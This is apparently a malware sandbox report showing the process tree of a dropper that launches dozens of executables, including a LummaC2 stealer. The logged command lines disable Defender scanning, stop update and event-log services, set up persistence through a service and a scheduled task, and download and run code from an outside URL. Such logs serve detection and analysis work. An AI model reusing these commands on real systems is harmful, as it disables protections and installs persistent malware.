      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4880
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe"
      4⤵
      PID:4156
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe
        5⤵
        
        PID:4860
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U3R00~1.EXE"
        6⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\U3R00~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U3R00~1.EXE
        7⤵
        
        PID:2932
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U3R01~1.EXE"
        6⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\U3R01~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U3R01~1.EXE
        7⤵
        
        PID:4932
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\zxcvb.exe"
      4⤵
      PID:2076
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\zxcvb.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\zxcvb.exe
        5⤵
        
        PID:5068
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\IjerkOff.exe"
      4⤵
      PID:4572
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\IjerkOff.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\IjerkOff.exe
        5⤵
        
        PID:4584
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"
        6⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "
        7⤵
        
        PID:4148
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\up.exe"
      4⤵
      PID:4664
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\up.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\up.exe
        5⤵
        
        PID:4740
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe"
      4⤵
      PID:3560
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe
        5⤵
        
        PID:3112
      - C:\Users\Admin\AppData\Local\Temp\1437224560.exe
        
        C:\Users\Admin\AppData\Local\Temp\1437224560.exe
        6⤵
        
        PID:4396
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TIDEX_~1.EXE"
      4⤵
      PID:4552
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TIDEX_~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TIDEX_~1.EXE
        5⤵
        
        PID:1100
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 464
        6⤵
        Program crash
        
        PID:3744
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CRYPTO~1.EXE"
      4⤵
      PID:3756
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CRYPTO~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CRYPTO~1.EXE
        5⤵
        
        PID:2452
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3124
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1656
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2452 -s 540
        6⤵
        Program crash
        
        PID:3972
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jeditor.exe"
      4⤵
      PID:2568
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jeditor.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jeditor.exe
        5⤵
        
        PID:4132
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/Admin/AppData/Local/Temp/RarSFX0/Files/jeditor.exe" RUN
        6⤵
        
        PID:4580
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\WEBDOWN.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\WEBDOWN.EXE http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE C:/Users/Admin/AppData/Local/Temp/RarSFX0/Files/jeditor.exe RUN
        7⤵
        
        PID:2440
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jeditor.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jeditor.exe
        8⤵
        
        PID:2828
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ECHONA~1.EXE"
      4⤵
      PID:4048
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ECHONA~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ECHONA~1.EXE
        5⤵
        
        PID:5572
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -nologo -noprofile -noninteractive -executionpolicy bypass -command .\serverBrowser.ps1
        6⤵
        
        PID:4456
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SAFMAN~1.EXE"
      4⤵
      PID:4952
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SAFMAN~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SAFMAN~1.EXE
        5⤵
        
        PID:1748
      - C:\Users\Admin\AppData\Local\Temp\is-PG1U9.tmp\SAFMAN~1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PG1U9.tmp\SAFMAN~1.tmp" /SL5="$A0340,7641408,67584,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SAFMAN~1.EXE"
        6⤵
        
        PID:4032
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\klounada.exe"
      4⤵
      PID:5808
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\klounada.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\klounada.exe
        5⤵
        
        PID:4180
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe"
      4⤵
      PID:2580
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe
        5⤵
        
        PID:4824
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe"
      4⤵
      PID:5148
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe
        5⤵
        
        PID:4664
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\niks.exe"
      4⤵
      PID:5684
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\niks.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\niks.exe
        5⤵
        
        PID:2932
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\test.exe"
      4⤵
      PID:512
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\test.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\test.exe
        5⤵
        
        PID:5176
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe"
      4⤵
      PID:896
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe
        5⤵
        
        PID:3196
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        
        PID:5384
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:4596
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:3684
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:5320
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:5928
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:3516
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:1952
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        
        PID:948
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        
        PID:5932
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        
        PID:4408
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        
        PID:3736
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WSNKISKT"
        6⤵
        Launches sc.exe
        
        PID:4220
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:3888
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:1920
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WSNKISKT"
        6⤵
        Launches sc.exe
        
        PID:2060
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\patch.exe"
      4⤵
      PID:4848
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\patch.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\patch.exe
        5⤵
        
        PID:5564
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\IGFXCU~1.EXE"
      4⤵
      PID:2460
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\IGFXCU~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\IGFXCU~1.EXE
        5⤵
        
        PID:5284
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\IGFXCU~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\IGFXCU~1.EXE
        6⤵
        
        PID:5716
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DEMAGO~1.EXE"
      4⤵
      PID:5240
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DEMAGO~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DEMAGO~1.EXE
        5⤵
        
        PID:5256
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex12.exe"
      4⤵
      PID:2480
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex12.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex12.exe
        5⤵
        
        PID:5516
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5872
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\olehpsp.exe"
        7⤵
        
        PID:1488
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\olehpsp.exe
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\olehpsp.exe
        8⤵
        
        PID:5020
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\fate.exe"
        7⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\fate.exe
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\fate.exe
        8⤵
        
        PID:4600
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe"
      4⤵
      PID:2808
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe
        5⤵
        
        PID:2028
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\KECBFBAEBK.exe"
        6⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\KECBFBAEBK.exe
        7⤵
        
        PID:4732
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DGHJEHJJDA.exe"
        6⤵
        
        PID:5984
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\DGHJEHJJDA.exe
        7⤵
        
        PID:3684
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup10.exe"
      4⤵
      PID:5948
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup10.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup10.exe
        5⤵
        
        PID:3512
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\juditttt.exe"
      4⤵
      PID:1360
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\juditttt.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\juditttt.exe
        5⤵
        
        PID:4848
      - C:\Users\Admin\AppData\Local\Temp\onefile_4848_133572128505262000\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\juditttt.exe
        6⤵
        
        PID:5420
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\syncUpd.exe"
      4⤵
      PID:300
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\syncUpd.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\syncUpd.exe
        5⤵
        
        PID:4580
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\net.exe"
      4⤵
      PID:5736
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\net.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\net.exe
        5⤵
        
        PID:3480
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DIUFHL~1.EXE"
      4⤵
      PID:3236
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DIUFHL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DIUFHL~1.EXE
        5⤵
        
        PID:2084
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        6⤵
        
        PID:3848
      - C:\Windows\system32\cmd.exe
        
        "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
        6⤵
        
        PID:2496
      - C:\Windows\system32\cmd.exe
        
        "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
        6⤵
        
        PID:3128
      - C:\Windows\system32\cmd.exe
        
        "cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DIUFHL~1.EXE" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
        6⤵
        
        PID:2884
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TRUECR~1.EXE"
      4⤵
      PID:4044
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TRUECR~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TRUECR~1.EXE
        5⤵
        
        PID:3472
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\native.exe"
      4⤵
      PID:5796
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\native.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\native.exe
        5⤵
        
        PID:5828
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RETAIL~1.EXE"
      4⤵
      PID:5556
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RETAIL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RETAIL~1.EXE
        5⤵
        
        PID:5264
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\amert.exe"
      4⤵
      PID:4468
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\amert.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\amert.exe
        5⤵
        
        PID:2044
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\YELLOW~1.EXE"
      4⤵
      PID:2752
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\YELLOW~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\YELLOW~1.EXE
        5⤵
        
        PID:960
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\netTimer.exe"
      4⤵
      PID:5924
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\netTimer.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\netTimer.exe
        5⤵
        
        PID:4404
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Opolis.exe"
      4⤵
      PID:2928
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Opolis.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Opolis.exe
        5⤵
        
        PID:1844
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OSM-CL~1.EXE"
        6⤵
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OSM-CL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OSM-CL~1.EXE
        7⤵
        
        PID:4772
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FATTHER.exe"
      4⤵
      PID:4916
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FATTHER.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FATTHER.exe
        5⤵
        
        PID:2856
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TWEETE~1.EXE"
      4⤵
      PID:2916
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TWEETE~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TWEETE~1.EXE
        5⤵
        
        PID:948
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 948 -s 876
        6⤵
        Program crash
        
        PID:4888
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jokerpos.exe"
      4⤵
      PID:6064
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jokerpos.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jokerpos.exe
        5⤵
        
        PID:6024
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5720
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 256
        7⤵
        Program crash
        
        PID:3708
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\file.exe"
      4⤵
      PID:2476
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\file.exe
        5⤵
        
        PID:1708
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\run.vbs"
        6⤵
        
        PID:4796
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\update.exe"
        7⤵
        
        PID:2940
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\update.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\update.exe
        8⤵
        
        PID:1908
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\setup.exe"
        7⤵
        
        PID:6008
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\setup.exe
        8⤵
        
        PID:5212
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup6.exe"
      4⤵
      PID:760
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup6.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup6.exe
        5⤵
        
        PID:3576
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U2RC0~1.EXE"
        6⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\U2RC0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U2RC0~1.EXE
        7⤵
        
        PID:5284
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U2RC1~1.EXE"
        6⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\U2RC1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U2RC1~1.EXE
        7⤵
        
        PID:6140
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asas.exe"
      4⤵
      PID:1412
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asas.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asas.exe
        5⤵
        
        PID:4852
      - C:\Windows\System32\werfault.exe
        
        \??\C:\Windows\System32\werfault.exe
        6⤵
        
        PID:4660
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OPERA_~1.EXE"
      4⤵
      PID:4728
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OPERA_~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OPERA_~1.EXE
        5⤵
        
        PID:3984
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\elevator.exe"
      4⤵
      PID:5268
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\elevator.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\elevator.exe
        5⤵
        
        PID:4524
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LummaC2.exe"
      4⤵
      PID:5792
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LummaC2.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LummaC2.exe
        5⤵
        
        PID:1132
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 124
        6⤵
        Program crash
        
        PID:3680
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laryyyyy.exe"
      4⤵
      PID:5824
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laryyyyy.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laryyyyy.exe
        5⤵
        
        PID:3328
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Roaming\Demm\launch.bat"
        6⤵
        
        PID:3576
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\clp.exe"
      4⤵
      PID:2144
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\clp.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\clp.exe
        5⤵
        
        PID:5360
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\bin.exe"
      4⤵
      PID:4860
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\bin.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\bin.exe
        5⤵
        
        PID:4704
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pac-Man.exe"
      4⤵
      PID:6104
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pac-Man.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pac-Man.exe
        5⤵
        
        PID:3564
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
    "bot.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies system executable filetype association
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops autorun.inf file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2468
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:1924
      - C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
        
        C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1804
        
